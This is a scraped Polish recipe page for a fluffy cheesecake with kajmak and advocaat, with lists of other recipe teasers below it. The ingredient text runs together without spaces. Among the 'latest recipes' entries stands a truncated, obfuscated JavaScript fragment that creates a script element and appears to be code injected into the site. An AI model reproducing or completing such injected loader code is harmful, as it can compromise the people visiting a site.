Puszysty sernik z masą krówkową i ajerkoniakową
Źródło: http://przepisnikiki.blogspot.com/2014/05/puszysty-sernik-z-masa-krowkowa-i.html
Ciasto na spod sernika: 2 lyzki cukru 1 cukier waniliowy 15 dag masla 2 zoltka 1,5 szkl. makilyzka gestej smietany1lyzeczka proszku do pieczenia lub bez pracyczekoladowe lub maslaneZagniesc ciasto, wlozyc do lodowki na pol godziny. Nastepnie wylozyc na blache rozlozyc cienko, nakluc widelcem i podpiec 15 minut w 190 stopniach.Na podpieczone ciasto lub herbatniki wykladamy cala puszke kajmaku...
Najnowsze przepisy
Śledzie gajowego z suszonymi borowikami (po myśliwsku)Są... ⇖ 16
(function(){ ak45=document.createElement("script");ak45_="o" ⇖ 9
Batat z pieca, lekko przypieczony na krawędziach i kremowy... ⇖ 20
Domowy chleb z ziarnami – puszysty, aromatyczny i idealny... ⇖ 16
Serniki z PodkarpaciaPrzeglądając podkarpackie przepisy... ⇖ 22
Przepisy z bloga
Pyszna i szybka salatka z tortellini Skladniki na ok 4-6... ⇖ 899
Skladniki250 gram masla3 szklanki maki pszennej5 lyzek... ⇖ 1366
Skladniki:5 jablek1 szklanka cukru2 szklanki maki1 cukier... ⇖ 1129
Skladniki na mniejsza blaszke2 duze paczki herbatnikow... ⇖ 615
Spod2 op. herbatnikow (moga bycczekoladowe) i wylozyc nimi... ⇖ 655
Skladniki:4 szkl. maki1 margaryna1 szkl. cukru1 sloik... ⇖ 781
Skladniki:na duza brytfanne4 duze paczki czekoladowych... ⇖ 676
Skladniki:1/2 kg mielonego miesa1 namoczona w wodzie bulka... ⇖ 764
Przepisy na czasie
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 1816
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1192
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 696
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 694
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 614
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 603
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 566
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 490
Pyszny, mięciutki i delikatny. Idealne na półmisek... ⇖ 481
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 467









































